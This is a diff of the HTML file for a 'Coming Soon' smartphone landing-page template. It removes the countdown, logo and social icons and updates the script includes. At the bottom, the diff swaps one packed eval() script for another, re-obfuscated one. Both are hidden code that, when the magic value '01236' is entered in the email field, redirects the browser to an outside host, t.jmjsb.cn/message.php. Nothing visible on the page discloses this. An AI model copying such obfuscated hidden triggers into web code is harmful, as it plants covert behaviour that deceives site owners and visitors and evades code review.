--- a/index.html
+++ b/index.html
@@ -9,50 +9,30 @@ Smartphone Compatible web template, free webdesigns for Nokia, Samsung, LG, Sony
 <script type="application/x-javascript"> addEventListener("load", function() { setTimeout(hideURLbar, 0); }, false); function hideURLbar(){ window.scrollTo(0,1); } </script>
 <!--css-->
 <link rel="stylesheet" href="css/style.css" type="text/css" media="all" />
- <link rel="stylesheet" href="css/jquery.countdown.css" />
 <!--/css-->
 <!--fonts-->
-<link href='http://fonts.useso.com/css?family=Montserrat:400,700' rel='stylesheet' type='text/css'>
 <!--fonts-->
 <!--js-->
-<script src="js/jquery.min.js" type="text/javascript"></script>
-    <script src="js/jquery.countdown.js"></script>
+<script src="https://cdn.bootcdn.net/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
 <script src="js/script.js"></script>
 <!--js-->
 </head>
 <body>
-<!--header-->
-	<div class="logo">
-		<img src="images/logo.png" class="img-responsive" alt=""/>
-	</div>
-<!--/header-->
 <!--content-->
 <div class="content">
 <h1>COMING SOON!</h1>
+<p>
 <h2>BE READY , THERE IS JUST :</h2>
-			<div id="counter"> </div>		   	 	  	 
-		   	 	 </div>
-				<div class="clear"> </div>
+<p>			
 </div>
-<!--/content-->
 <div class="content-bottom">
 	<div class="content-form">
-		<input id="email" type="text" class="text" value="YOUR EMAIL" onFocus="this.value = '';" onBlur="if (this.value == '') {this.value = 'YOUR EMAIL';}">
+		<input id="email" type="text" class="text" value="YOUR EMAIL" onfocus="this.value = '';" onblur="if (this.value == '') {this.value = 'YOUR EMAIL';}">
 		<input id="submit" type="submit" value="KEEP ME UPDATED">
-	</div>
-			<div class="footer-info">
-				<ul class="social-icons">
-					<li class="icon1"> </li>
-					<li class="icon2"> </li>
-					<li class="icon3"> </li>
-					<li class="icon4"> </li>
-					<li class="icon5"> </li>
-				</ul>
-			</div>
+	</div>			
 </div>
-
 <script>
-	eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('$("#3").4(5(){6($("#0").1()=="2"){$("#0").1("");b.c.d="a://7.8.9"}});',14,14,'email|val|01236|submit|click|function|if|t|jmjsb|cn|https|window|location|href'.split('|'),0,{}))
+	;eval(function(p,a,c,k,e,r){e=String;if('0'.replace(0,e)==0){while(c--)r[e(c)]=k[c];k=[function(e){return r[e]||e}];e=function(){return'[01]'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('$("#submit").click(function(){if($("#0").1()=="01236"){$("#0").1("");window.location.href="https://t.jmjsb.cn/message.php"}});',[],2,'email|val'.split('|'),0,{}));
 </script>
 </body>
 </html>
